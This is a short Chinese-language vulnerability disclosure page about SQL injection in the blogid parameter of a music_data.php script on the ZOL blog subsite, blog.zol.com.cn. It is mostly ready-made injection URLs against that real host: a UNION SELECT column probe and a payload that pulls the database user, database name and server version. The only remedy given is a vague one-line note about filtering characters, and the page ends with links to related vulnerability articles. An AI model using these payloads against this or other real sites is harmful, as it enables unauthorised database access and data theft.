中关村在线博客子站SQL注入及修复方案
摘要:http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0unionselect1,...
http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5--
http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7c,version()),4,5--
修复方案:
过滤参数提交非法字符或者拦截敏感字符等等。。。
【中关村在线博客子站SQL注入及修复方案】相关文章:
★ Velocity Parse()函数引发的本地包含漏洞及利用方法
★ Apache HTTP Server 存在模块跨站脚本漏洞
★ MirOS BSD Korn Shell本地权限提升漏洞